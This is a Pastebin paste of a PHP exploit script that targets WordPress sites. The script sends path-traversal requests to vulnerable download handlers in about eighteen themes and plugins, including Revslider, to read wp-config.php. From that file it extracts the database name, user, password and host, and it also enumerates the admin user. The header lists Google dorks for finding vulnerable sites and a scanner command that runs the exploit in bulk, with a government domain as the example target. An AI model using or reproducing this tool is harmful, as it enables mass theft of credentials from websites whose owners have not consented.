SHARE
TWEET

[EXPLOIT] Wordpress A.F.D Verification/ INURL - BRASIL

Googleinurl Nov 21st, 2014 (edited) 2,964 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/php -q
  2. <?php
  3. #===============================================================================
  4. # NAME:                 Wordpress A.F.D Verification/ INURL - BRASIL
  5. # TIPE:                 Arbitrary File Download
  6. # Tested on:            Linux
  7. # EXECUTE:              php exploit.php www.target.gov.us
  8. # OUTPUT:               WORDPRES_A_F_D.txt
  9. # AUTOR:                Cleiton Pinheiro / NICK: GoogleINURL
  10. # Blog:                 http://blog.inurl.com.br
  11. # Twitter:              https://twitter.com/googleinurl
  12. # Fanpage:              https://fb.com/InurlBrasil
  13. # GIT:                  https://github.com/googleinurl
  14. # YOUTUBE               https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
  15. # PACKETSTORMSECURITY:: http://packetstormsecurity.com/user/googleinurl/
  16. #
  17. # ------------------------------------------------------------------------------
  18. #  Comand Exec Scanner INURLBR:
  19. # ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
  20. # ------------------------------------------------------------------------------
  21. #
  22. # Download Scanner INURLBR:
  23. # https://github.com/googleinurl/SCANNER-INURLBR
  24. # ------------------------------------------------------------------------------
  25. #
  26. # D O R K'S:
  27. # ------------------------------------------------------------------------------
  28. #
  29. # WordPress Ultimatum Theme Arbitrary File Download
  30. # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
  31. # Google Dork:: "Index of" & /wp-content/themes/ultimatum
  32. # ------------------------------------------------------------------------------
  33. #
  34. # WordPress Medicate Theme Arbitrary File Download
  35. # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
  36. # Google Dork:: "Index of" & /wp-content/themes/medicate/
  37. # ------------------------------------------------------------------------------
  38. #
  39. # WordPress Centum Theme Arbitrary File Download
  40. # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
  41. # Google Dork:: "Index of" & /wp-content/themes/Centum/
  42. # ------------------------------------------------------------------------------
  43. #
  44. # WordPress Avada Theme Arbitrary File Download
  45. # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
  46. # Google Dork:: "Index of" & /wp-content/themes/Avada/
  47. # ------------------------------------------------------------------------------
  48. #
  49. # WordPress Striking Theme & E-Commerce Arbitrary File Download
  50. # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
  51. # Google Dork:: "Index of" & /wp-content/themes/striking_r/
  52. # ------------------------------------------------------------------------------
  53. #
  54. # WordPress Beach Apollo Arbitrary File Download
  55. # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
  56. # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
  57. # ------------------------------------------------------------------------------
  58. #
  59. # Dork Google: inurl:ajax-store-locator
  60. # index of ajax-store-locator
  61. # Vendor Homepage:: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
  62. # ------------------------------------------------------------------------------
  63. #
  64. # WordPress cuckootap Theme Arbitrary File Download
  65. # Google Dork:: "Index of" & /wp-content/themes/cuckootap/
  66. # Vendor Homepage:: http://www.cuckoothemes.com/
  67. # ------------------------------------------------------------------------------
  68. #
  69. # WordPress IncredibleWP Theme Arbitrary File Download
  70. # Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
  71. # Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
  72. # ------------------------------------------------------------------------------
  73. #
  74. # WordPress Ultimatum Theme Arbitrary File Download
  75. # Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
  76. # Google Dork:: "Index of" & /wp-content/themes/ultimatum
  77. # ------------------------------------------------------------------------------
  78. #
  79. # WordPress Medicate Theme Arbitrary File Download
  80. # Vendor Homepage:: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
  81. # Google Dork:: "Index of" & /wp-content/themes/medicate/
  82. # ------------------------------------------------------------------------------
  83. #
  84. # WordPress Centum Theme Arbitrary File Download
  85. # Vendor Homepage:: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
  86. # Google Dork:: "Index of" & /wp-content/themes/Centum/
  87. # ------------------------------------------------------------------------------
  88. #
  89. # WordPress Avada Theme Arbitrary File Download
  90. # Vendor Homepage:: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
  91. # Google Dork:: "Index of" & /wp-content/themes/Avada/
  92. # ------------------------------------------------------------------------------
  93. #  
  94. # WordPress Striking Theme & E-Commerce Arbitrary File Download
  95. # Vendor Homepage:: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
  96. # Google Dork:: "Index of" & /wp-content/themes/striking_r/
  97. # ------------------------------------------------------------------------------
  98. #
  99. # WordPress Beach Apollo Arbitrary File Download
  100. # Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
  101. # Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
  102. # ------------------------------------------------------------------------------
  103. #
  104. # WordPress Trinity Theme Arbitrary File Download
  105. # Vendor Homepage:: https://churchthemes.net/themes/trinity/
  106. # Google Dork:: "Index of" & /wp-content/themes/trinity/
  107. # ------------------------------------------------------------------------------
  108. #
  109. # WordPress Lote27 Theme Arbitrary File Download
  110. # Google Dork:: "Index of" & /wp-content/themes/lote27/
  111. # ------------------------------------------------------------------------------
  112. #
  113. # WordPress Revslider Theme Arbitrary File Download
  114. # Vendor Homepage:: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
  115. # Google Dork:: wp-admin & inurl:revslider_show_image
  116. # ------------------------------------------------------------------------------
  117. #http://i.imgur.com/45BFlNe.png
  118. #===============================================================================
  119.  
  120. $banner = "  
  121.  _____
  122. (_____)    ____ _   _ _    _ _____  _                 ____                _ _
  123. (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \              (_) |
  124.  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___ _| |
  125.   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __| | |
  126.   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \ | |
  127.  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|  \__,_|___/_|_|
  128.  \n\033[1;37m0xNeither war between hackers, nor peace for the system.\033[0m\r
  129. ";
  130.  
  131. error_reporting(1);
  132. set_time_limit(0);
  133. ini_set('display_errors', 1);
  134. ini_set('max_execution_time', 0);
  135. ini_set('allow_url_fopen', 1);
  136. ob_implicit_flush(true);
  137. ob_end_flush();
  138.  
  139. function __plus() {
  140.  
  141.     ob_flush();
  142.     flush();
  143. }
  144.  
  145. print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
  146. $argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}";
  147. !filter_var($argv[1], FILTER_VALIDATE_URL) ?  exit("{$banner}0x[ERROR]: SET URL / Execute: php exploit.php www.target.gov.us\n") : NULL;
  148.  
  149. print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
  150. print "\n------------------------------------------------------------------------------------------------------------------";
  151. __plus();
  152. $users = file_get_contents("{$argv[1]}/?author=1");
  153. __plus();
  154. preg_match('/<title>(.*?)<\/title>/si', $users, $user);
  155. $wpuser = explode('|', $user[1]);
  156. $headers = get_headers($argv[1], 1);
  157. __plus();
  158. print "\n0x ". date("h:m:s") ." [INFO][COD]:: ";
  159. print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
  160. print "\n0x ". date("h:m:s") ." [INFO][Server]:: ";
  161. is_array($headers['Server']) ? print_r($headers['Server'][0]) : print_r($headers['Server']);
  162. print "\n0x ". date("h:m:s") ." [INFO][X-Pingback]:: ";
  163. is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) : print_r($headers['X-Pingback']);
  164. print "\n0x ". date("h:m:s") ." [INFO][X-Powered-By]:: ";
  165. is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) : print_r($headers['X-Powered-By']);
  166. print_r("\n0x ". date("h:m:s") ." [INFO][TARGET]:: {$argv[1]} | [WP USER]:: " . str_replace("\n", '', $wpuser[0]));
  167. print "\n0x ". date("h:m:s") ." [INFO][OUTPUT FILE]:: WORDPRESS_A_F_D.txt\n";
  168. __plus();
  169.  
  170. __request($argv[1], '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');
  171.  
  172. __request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');
  173.  
  174. __request($argv[1], '/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');
  175.  
  176. __request($argv[1], '/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');
  177.  
  178. __request($argv[1], '/wp-content/themes/markant/download.php?file=../../wp-config.php');
  179.  
  180. __request($argv[1], '/wp-content/themes/yakimabait/download.php?file=./wp-config.php');
  181.  
  182. __request($argv[1], '/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');
  183.  
  184. __request($argv[1], '/wp-content/themes/felis/download.php?file=../wp-config.php');
  185.  
  186. __request($argv[1], '/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');
  187.  
  188. __request($argv[1], '/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');
  189.  
  190. __request($argv[1], '/wp-content/themes/epic/includes/download.php?file=wp-config.php');
  191.  
  192. __request($argv[1], '/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');
  193.  
  194. __request($argv[1], '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');
  195.  
  196. __request($argv[1], '/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');
  197.  
  198. __request($argv[1], '/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');
  199.  
  200. __request($argv[1], '/wp-content/themes/lote27/download.php?download=../../../wp-config.php');
  201.  
  202. __request($argv[1], '/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');
  203.  
  204. __request($argv[1], '/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');
  205.  
  206. function __request($url, $plugin) {
  207.  
  208.     $objcurl = curl_init();
  209.     $caminho = NULL;
  210.     $status = array();
  211.  
  212.     curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
  213.     curl_setopt($objcurl, CURLOPT_HEADER, 1);
  214.     curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
  215.     curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
  216.     curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
  217.     $corpo = curl_exec($objcurl);
  218.  
  219.     if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
  220.  
  221.         return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
  222.     }
  223. __plus();
  224.  
  225.     if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
  226.  
  227. //-----------------------------------------------------------------------------
  228.         preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
  229.         preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
  230.         preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
  231.         preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
  232.         preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
  233. //-----------------------------------------------------------------------------
  234. __plus();
  235.         $res = "\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN]::    \033[1;37m [ " . date("d-m-Y H:i:s") . " ]\n";
  236.         $res.= ("\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
  237.         $res.= ("::" . $status['DB_USER'][0][0]);
  238.         $res.= ("::" . $status['DB_PASSWORD'][0][0]);
  239.         $res.= ("::" . $status['DB_HOST'][0][0]);
  240.         $res.= ("::" . $status['DB_CHARSET'][0][0]);
  241.         $res.= "\n\033[0;32m0x ". date("h:m:s") ." [INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
  242.         $res.= "\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
  243.         print $res;
  244.         $res = str_replace('','',str_replace('','',str_replace('','',$res)));
  245.         file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
  246. __plus();
  247.     } else {
  248.  
  249.         print "\n\033[1;31m0x ". date("h:m:s") ." [INFO][NOT VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
  250.     }
  251.     curl_close($objcurl);
  252. __plus();
  253. }
RAW Paste Data
Top